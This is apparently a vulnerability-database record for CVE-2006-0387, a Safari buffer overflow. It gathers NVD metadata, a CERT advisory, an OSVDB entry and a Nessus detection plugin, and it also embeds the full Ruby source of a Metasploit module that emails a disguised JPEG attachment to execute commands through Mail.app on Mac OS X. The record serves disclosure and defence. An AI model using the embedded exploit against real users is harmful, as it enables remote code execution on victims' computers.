ID CVE-2006-0387
Type cve
Reporter NVD
Modified 2017-07-19T21:29:42
Description
Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.
{"id": "CVE-2006-0387", "bulletinFamily": "NVD", "title": "CVE-2006-0387", "description": "Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.", "published": "2006-03-06T15:06:00", "modified": "2017-07-19T21:29:42", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "reporter": "NVD", "references": ["http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/25032", "http://www.vupen.com/english/advisories/2006/0791", "http://www.kb.cert.org/vuls/id/176732", "http://www.securityfocus.com/bid/16907", "http://www.us-cert.gov/cas/techalerts/TA06-062A.html", "http://docs.info.apple.com/article.html?artnum=303382", "http://securitytracker.com/id?1015713"], "cvelist": ["CVE-2006-0387"], "type": "cve", "lastseen": "2017-07-20T10:49:04", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:apple:mac_os_x:10.3.4", "cpe:/o:apple:mac_os_x:10.3", "cpe:/o:apple:mac_os_x:10.3.3", "cpe:/o:apple:mac_os_x_server:10.3.8", "cpe:/o:apple:mac_os_x:10.4.3", "cpe:/o:apple:mac_os_x:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.1", "cpe:/o:apple:mac_os_x_server:10.4.5", "cpe:/o:apple:mac_os_x_server:10.4.2", "cpe:/o:apple:mac_os_x:10.3.8", "cpe:/o:apple:mac_os_x:10.4", "cpe:/o:apple:mac_os_x_server:10.3.4", "cpe:/o:apple:mac_os_x_server:10.4.4", "cpe:/o:apple:mac_os_x:10.3.2", "cpe:/o:apple:mac_os_x_server:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.6", "cpe:/o:apple:mac_os_x:10.3.9", "cpe:/o:apple:mac_os_x:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.2", "cpe:/o:apple:mac_os_x:10.4.2", "cpe:/o:apple:mac_os_x:10.3.1", "cpe:/o:apple:mac_os_x_server:10.3.9", "cpe:/o:apple:mac_os_x_server:10.3", "cpe:/o:apple:mac_os_x_server:10.4.3", "cpe:/o:apple:mac_os_x:10.3.6", "cpe:/o:apple:mac_os_x_server:10.3.5", "cpe:/o:apple:mac_os_x_server:10.3.3", "cpe:/o:apple:mac_os_x_server:10.4", "cpe:/o:apple:mac_os_x:10.3.5", "cpe:/o:apple:mac_os_x:10.4.5", "cpe:/o:apple:mac_os_x:10.4.4"], "cvelist": ["CVE-2006-0387"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.", "edition": 1, "enchantments": {}, "hash": "e60ac24834d590245ecbdb5d76e833b3de39a36084fe930651b7e3aa1c5fb8f0", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "fd762b7d24af26f0140ae7b4170b85ba", "key": "published"}, {"hash": "16b03575b4fe50b253981af960e7e012", "key": "description"}, {"hash": "455a6fc571b85cac1b633f2750c8bdfc", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "06e276ce1fbb72f3ae23a1dd84ff9adf", "key": "title"}, {"hash": "cb9763286da59938c3282a431bdd1ea3", "key": "cpe"}, {"hash": "96d125c53c8803351d1b766190c10318", "key": "cvelist"}, {"hash": "ad14cac1c037f54511378a53522f56ca", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c18384566a4e910b2327c9a7d59a7756", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "id": "CVE-2006-0387", "lastseen": "2016-09-03T06:24:34", "modified": "2011-03-07T21:29:55", "objectVersion": "1.2", "published": "2006-03-06T15:06:00", "references": ["http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html", "http://www.vupen.com/english/advisories/2006/0791", "http://www.kb.cert.org/vuls/id/176732", "http://www.securityfocus.com/bid/16907", "http://www.us-cert.gov/cas/techalerts/TA06-062A.html", "http://docs.info.apple.com/article.html?artnum=303382", "http://xforce.iss.net/xforce/xfdb/25032", "http://securitytracker.com/id?1015713"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-0387", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T06:24:34"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "cb9763286da59938c3282a431bdd1ea3"}, {"key": "cvelist", "hash": "96d125c53c8803351d1b766190c10318"}, {"key": "cvss", "hash": "956b0cce3d9454921494ef535bcdf2a4"}, {"key": "description", "hash": "16b03575b4fe50b253981af960e7e012"}, {"key": "href", "hash": "455a6fc571b85cac1b633f2750c8bdfc"}, {"key": "modified", "hash": "97427b244cbdb4c83d67569cb42be292"}, {"key": "published", "hash": "fd762b7d24af26f0140ae7b4170b85ba"}, {"key": "references", "hash": "0c8c2d9b8383e5f9d83ade3dc3d3ed1d"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "06e276ce1fbb72f3ae23a1dd84ff9adf"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c80ad30085a7297c86a77180a08a38c0ce531ead076319deefaa27d3af505356", "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2017-07-20T10:49:04"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:23637"]}, {"type": "cert", "idList": ["VU:176732"]}, {"type": "nessus", "idList": ["MACOSX_SECUPD2006-001.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/EMAIL/MAILAPP_IMAGE_EXEC"]}], "modified": "2017-07-20T10:49:04"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "cpe": ["cpe:/o:apple:mac_os_x:10.3.4", "cpe:/o:apple:mac_os_x:10.3", "cpe:/o:apple:mac_os_x:10.3.3", "cpe:/o:apple:mac_os_x_server:10.3.8", "cpe:/o:apple:mac_os_x:10.4.3", "cpe:/o:apple:mac_os_x:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.1", "cpe:/o:apple:mac_os_x_server:10.4.5", "cpe:/o:apple:mac_os_x_server:10.4.2", "cpe:/o:apple:mac_os_x:10.3.8", "cpe:/o:apple:mac_os_x:10.4", "cpe:/o:apple:mac_os_x_server:10.3.4", "cpe:/o:apple:mac_os_x_server:10.4.4", "cpe:/o:apple:mac_os_x:10.3.2", "cpe:/o:apple:mac_os_x_server:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.6", "cpe:/o:apple:mac_os_x:10.3.9", "cpe:/o:apple:mac_os_x:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.2", "cpe:/o:apple:mac_os_x:10.4.2", "cpe:/o:apple:mac_os_x:10.3.1", "cpe:/o:apple:mac_os_x_server:10.3.9", "cpe:/o:apple:mac_os_x_server:10.3", "cpe:/o:apple:mac_os_x_server:10.4.3", "cpe:/o:apple:mac_os_x:10.3.6", "cpe:/o:apple:mac_os_x_server:10.3.5", "cpe:/o:apple:mac_os_x_server:10.3.3", "cpe:/o:apple:mac_os_x_server:10.4", "cpe:/o:apple:mac_os_x:10.3.5", "cpe:/o:apple:mac_os_x:10.4.5", "cpe:/o:apple:mac_os_x:10.4.4"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"cert": [{"lastseen": "2018-12-25T20:19:26", "bulletinFamily": "info", "description": "### Overview \n\nApple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\n**Safari **\n\nApple [Safari](<http://www.apple.com/safari/>) is a web browser that comes with the [Mac OS X](<http://www.apple.com/macosx/>) operating system. \n \n**The Problem** \n \nApple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to access a web page containing specially crafted JavaScript with Safari. \n \n--- \n \n### Impact \n\nA remote attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Install an update**\n\nThis issue is corrected in [Apple Security Update 2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n \n--- \n \n**Disable JavaScript in Safari**\n\n \nFor instructions on how to disable JavaScript in Safari, please refer to the Safari section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Safari>) document. \n \n--- \n \n### Vendor Information\n\n176732\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Computer, Inc. \n\nUpdated: March 03, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://docs.info.apple.com/article.html?artnum=303382>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23176732 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://docs.info.apple.com/article.html?artnum=303382>\n * <http://secunia.com/advisories/19064/>\n\n### Credit\n\nThis issue was reported in Apple Security Update 2006-001 \n\nThis document was written by Jeff Gennari \n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-0387](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387>) \n---|--- \n**Severity Metric:****** | 17.21 \n**Date Public:** | 2006-03-02 \n**Date First Published:** | 2006-03-03 \n**Date Last Updated: ** | 2006-03-03 15:02 UTC \n**Document Revision: ** | 10 \n", "modified": "2006-03-03T15:02:00", "published": "2006-03-03T00:00:00", "id": "VU:176732", "href": "https://www.kb.cert.org/vuls/id/176732", "type": "cert", "title": "Apple Safari vulnerable to buffer overflow", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "description": "## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch (2006-001) to address this vulnerability.\n## References:\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=303382)\nSecurity Tracker: 1015713\n[Secunia Advisory ID:19064](https://secuniaresearch.flexerasoftware.com/advisories/19064/)\n[Related OSVDB ID: 23639](https://vulners.com/osvdb/OSVDB:23639)\n[Related OSVDB ID: 23646](https://vulners.com/osvdb/OSVDB:23646)\n[Related OSVDB ID: 23636](https://vulners.com/osvdb/OSVDB:23636)\n[Related OSVDB ID: 23640](https://vulners.com/osvdb/OSVDB:23640)\n[Related OSVDB ID: 23641](https://vulners.com/osvdb/OSVDB:23641)\n[Related OSVDB ID: 23642](https://vulners.com/osvdb/OSVDB:23642)\n[Related OSVDB ID: 23643](https://vulners.com/osvdb/OSVDB:23643)\n[Related OSVDB ID: 23648](https://vulners.com/osvdb/OSVDB:23648)\n[Related OSVDB ID: 23649](https://vulners.com/osvdb/OSVDB:23649)\n[Related OSVDB ID: 23638](https://vulners.com/osvdb/OSVDB:23638)\n[Related OSVDB ID: 23644](https://vulners.com/osvdb/OSVDB:23644)\n[Related OSVDB ID: 23645](https://vulners.com/osvdb/OSVDB:23645)\n[Related OSVDB ID: 23647](https://vulners.com/osvdb/OSVDB:23647)\nNews Article: http://www.informationweek.com/news/showArticle.jhtml;?articleID=181500394\n[CVE-2006-0387](https://vulners.com/cve/CVE-2006-0387)\n", "modified": "2006-02-28T06:02:40", "published": "2006-02-28T06:02:40", "href": "https://vulners.com/osvdb/OSVDB:23637", "id": "OSVDB:23637", "title": "Apple Safari JavaScript Processing Unspecified Overflow", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:09:01", "bulletinFamily": "scanner", "description": "The remote host is running Apple Mac OS X, but lacks Security Update 2006-001.\n\nThis security update contains fixes for the following applications :\n\napache_mod_php automount Bom Directory Services iChat IPSec LaunchServices LibSystem loginwindow Mail rsync Safari Syndication", "modified": "2018-07-14T00:00:00", "id": "MACOSX_SECUPD2006-001.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20990", "published": "2006-03-02T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2006-001)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20990);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2005-2713\", \"CVE-2005-2714\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3391\",\n \"CVE-2005-3392\", \"CVE-2005-3706\", \"CVE-2005-3712\", \"CVE-2005-4217\", \"CVE-2005-4504\",\n \"CVE-2006-0383\", \"CVE-2006-0384\", \"CVE-2006-0386\", \"CVE-2006-0387\", \"CVE-2006-0388\",\n \"CVE-2006-0389\", \"CVE-2006-0391\", \"CVE-2006-0395\", \"CVE-2006-0848\");\n script_bugtraq_id(16736, 16907);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2006-001)\");\n script_summary(english:\"Check for Security Update 2006-001\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote operating system is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Apple Mac OS X, but lacks\nSecurity Update 2006-001.\n\nThis security update contains fixes for the following\napplications :\n\napache_mod_php\nautomount\nBom\nDirectory Services\niChat\nIPSec\nLaunchServices\nLibSystem\nloginwindow\nMail\nrsync\nSafari\nSyndication\");\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=303382\");\n script_set_attribute(attribute:\"solution\", value:\n\"Mac OS X 10.4 :\nhttp://www.apple.com/support/downloads/securityupdate2006001macosx1045ppc.html\nhttp://www.apple.com/support/downloads/securityupdate2006001macosx1045intel.html\n\nMac OS X 10.3 :\nhttp://www.apple.com/support/downloads/securityupdate20060011039client.html\nhttp://www.apple.com/support/downloads/securityupdate20060011039server.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Archive Metadata Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-5]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2006-00[123467]|2007-003)\", string:packages)) security_hole(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-04T12:26:21", "bulletinFamily": "exploit", "description": "This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5.", "modified": "2017-07-24T13:26:21", "published": "2007-11-26T06:11:10", "id": "MSF:EXPLOIT/OSX/EMAIL/MAILAPP_IMAGE_EXEC", "href": "", "type": "metasploit", "title": "Mail.app Image Attachment Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mail.app Image Attachment Command Execution',\n 'Description' => %q{\n This module exploits a command execution vulnerability in the\n Mail.app application shipped with Mac OS X 10.5.0. This flaw was\n patched in 10.4 in March of 2007, but reintroduced into the final\n release of 10.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm', 'kf'],\n 'References' =>\n [\n ['CVE', '2006-0395'],\n ['CVE', '2007-6165'],\n ['OSVDB', '40875'],\n ['BID', '26510'],\n ['BID', '16907']\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Payload' =>\n {\n 'Space' => 8192,\n 'DisableNops' => true,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'ConnectionType' => '-bind -find',\n },\n },\n 'Platform' => %w{ unix osx },\n 'Targets' =>\n [\n [ 'Mail.app - Command Payloads',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'PayloadCompat' => {\n 'RequiredCmd' => 'generic perl ruby bash-tcp telnet',\n }\n }\n ],\n [ 'Mail.app - Binary Payloads (x86)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mail.app - Binary Payloads (ppc)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n ],\n 'DisclosureDate' => 'Mar 01 2006'\n ))\n\n end\n\n def autofilter\n false\n end\n\n def exploit\n\n exts = ['jpg']\n\n gext = exts[rand(exts.length)]\n name = rand_text_alpha(5) + \".#{gext}\"\n data = rand_text_alpha(rand(32)+1)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n dbl = Rex::MIME::Message.new\n dbl.header.set(\"Content-Type\", \"multipart/appledouble;\\r\\n boundary=#{dbl.bound}\")\n dbl.header.set(\"Content-Disposition\", \"inline\")\n\n # AppleDouble file version 2\n # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'\n # Real Name matches msf random generated 5 character name - (I cheated ala gsub)\n\n resfork =\n \"AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\\r\\n\" +\n \"UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\\r\\n\" +\n \"AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\\r\\n\" +\n \"7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\\r\\n\" +\n \"5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\\r\\n\" +\n \"/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\\r\\n\" +\n \"8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\\r\\n\" +\n \"9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\\r\\n\" +\n \"/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\\r\\n\" +\n \"/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\\r\\n\" +\n \"AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8\" + \"\\r\\n\"\n\n fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub(\"Heise.jpg\",name), \"\\r\\n\" )\n\n cid = \"<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>\"\n\n cmd = ''\n\n if (target.arch.include?(ARCH_CMD))\n cmd = Rex::Text.encode_base64(payload.encoded, \"\\r\\n\")\n else\n bin = generate_payload_exe\n cmd = Rex::Text.encode_base64(bin, \"\\r\\n\")\n end\n\n\n dbl.add_part(fork , \"application/applefile;\\r\\n name=\\\"#{name}\\\"\", \"base64\", \"inline;\\r\\n filename=#{name}\" )\n dbl.add_part(cmd , \"image/jpeg;\\r\\n x-mac-type=0;\\r\\n x-unix-mode=0755;\\r\\n x-mac-creator=0;\\r\\n name=\\\"#{name}\\\"\", \"base64\\r\\nContent-Id: #{cid}\", \"inline;\\r\\n filename=#{name}\" )\n\n msg.parts << dbl\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/email/mailapp_image_exec.rb"}]}